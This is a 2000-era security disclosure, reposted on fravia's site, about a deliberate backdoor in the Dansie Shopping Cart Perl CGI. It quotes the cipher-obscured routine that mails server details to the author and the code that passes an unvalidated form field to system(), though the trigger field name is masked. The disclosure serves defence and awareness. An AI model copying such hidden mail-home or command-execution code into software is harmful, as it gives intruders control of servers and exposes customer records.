~ Malwares ~
         Petit image    Malwares
(Courtesy of fravia's advanced searching lores)

Trojanized Commercial Shopping Cart
by joeATblarg.net
published at fravia's searchlores in April 2000

I was quite interested by this short 'erudite' reversing essay, that I found on my old messageboard in April. I think that it will be quite useful as 'eye-opener' for all those that don't understand WHY software reverse engineering is so important AS DEFENCE, and why it should INCENTIVATED, instead than forbidden.
Or do you really want a future where any bastard can sniff your box without being detected?

Trojanized Commercial Shopping Cart
===============================================================

Dansie Shopping Cart

Version : 3.04 (presumably earlier versions as well)
Author : Craig Dansie
URL : http://www.dansie.net/
Language : Perl (both NT and Unix platforms are vulnerable)
License : Commercial, starting at $150.00
Copyright Dec 10, 1997-2000, Dansie Website Design


Synopsis : This program -deliberately- allows arbitrary commands to be
executed on the victim server.


One of our clients, while installing and configuring the Dansie Shopping
Cart, ran into difficulty integrating PGP, the shopping cart program, and
our secure server setup. While trying to assist our client with the cart
and PGP configuration we discovered a couple of things.

The CGI, under certain conditions, sends an email to the author of the
Dansie shopping cart software, 'tech@dansie.net'. This is not readily
apparent as the code that handles this transaction incorporates a simple
Caesar Cipher to hide the email address. The cipher is handled via the
subroutine 'there2':

------
sub there2
{
$_ = "$_[0]";
tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/;
tr/_/-/;
tr/\@/\./;
return $_;
}
-------

The call that creates this email address and sends the mail is the
function 'there3'.

-------
sub there3
{
if (($ENV{'OS'} !~ /Windows_NT/i) && ($mailprog) && (-e "$mailprog"))
{
$a = &there2('8v59')."\@".&there2('kte3cv').".".&there2('ev8');
$b = &there2('8v59_3jhhzi8');
pop(@there2);
pop(@there2);
$c = &there2("@there2");
open (TECH, "|$mailprog $a");
print TECH "To: $a\n";
print TECH "From: $a\n";
print TECH "Subject: $b\n\n";
print TECH "$path3\n";
print TECH "$ENV{'HTTP_HOST'} $ENV{'SERVER_NAME'}\n";
print TECH "$c\n";
print TECH "$e $there\n" if ($e);
close (TECH);
}
}
-------

The ciphered strings, when passed through 'there2', result in:

8v59 == tech
kte3cv == dansie
ev8 == net
8v59_3jhhzi8 == tech-support
$a == tech@dansie.net
$b == Subject: tech-support

This seems curious, but plausible reasons could include insuring License
compliance, or maybe the cart automatically sends this email when an error
occurs. The program definitely goes out of its way to hide the fact that the
mail is being sent.

While going through the rest of the code we discovered a much more
interesting item.

(We've masked out the actual trigger element with question marks)

----------
if ( ( ( $FORM{'?????????'}) && ($ENV{'HTTP_HOST'} !~ /($d)/) ) || ( ($FORM{'?????????'} ) && (!$d) ) )
{
if ( $ENV{'OS'} )
{
system("$FORM{'?????????'}");
}
else
{
new Object ;
}
exit;
}
---------

The form element '?????????', which was originally a pseudo-random appearing
nine digit string of letters and numbers, allows an intruder to execute any
command on the server with the same privileges as the CGI process itself.
Although this is a full disclosure list, the trigger element is obscured to
prevent the script kiddies from running away with this back door. If you
own the cart, then you have access to the source code and can discover the
element in question easily enough on your own.

Further searches through the code reveal that this form element is immune
to data validation - it gets passed into this code fragment unchallenged.

The '$d' variable of the condition which permits the back door to function
is set elsewhere in the program to contain the string 'dansie'. (Again,
using the ciphertext algorithm) This indicates that the form element won't
work on Dansie's own host, but will work on anyone elses. There are
additional problems with the 'there' function but we'll leave them as
exercises for the reader to decipher.

Dansie.net, armed with the server name and URL to the CGI executable
provided by the cloaked email routine, would be able to run commands on any
web server on the Internet that has the Dansie Shopping Cart installed. It
takes little imagination to dream up the potential havoc and privacy
violations this level of access could result in; from stealing private
customer records to a full-blown crack of an E-Commerce server.

When checking to see if this was a known issue, the following post from
"Kasey Johns" , made a little over a week ago,
was discovered in alt.comp.perlcgi.freelance:

http://www.deja.com/getdoc.xp?AN=601644315
Follow-up article: http://www.deja.com/getdoc.xp?AN=601857849

We won't quote Kasey's posts here, in brief, Kasey also discovered the back
door and cloaked email routines. Kasey also provides evidence in the post to
indicate that not only is Dansie well aware of the back door routine, but
may be actively attempting to utilize it.

Based upon our own investigation, the information Kasey posted, and our own
firewall logs (see below), it is our opinion that the back door within
Dansie.net's shopping cart can best be summarized as follows:

1. The back door is very deliberate.
2. It isn't unique to the one copy we have access to here.
3. *Is being actively utilized by the author of the CGI.

* Based upon the log snippet in Kasey's post showing attempted access to
the CGI from an Earthlink dial-up IP. (209.179.141.0/24). According to
Kasey, access to the CGI was attempted less than 30 minutes after the cart
was installed.

When we noticed the attempted usage of Kasey's server, a quick check of our
own firewall logs revealed the following:

Packet log: input REJECT eth0 PROTO=6 209.179.141.xx:1054 x.x.x.x:80
{repeated several dozen times}

We can only assume these attempts, made from the same /24 on Earthlink's
dial-ups as the one used to probe Kasey's server, were from the author of
the shopping cart.

We will not try to hazard a guess as to why Dansie.net felt the need to
include a back door within their shopping cart software. Whatever their
reasoning may be, it is our opinion that no reason, no matter how well
thought out or rationalized, justifies the existence of this back door. No
reasoning can possibly explain away a routine that deliberately allows an
intruder unrestricted and unauthorized access to any server on the Internet
that has the Dansie Shopping Cart installed.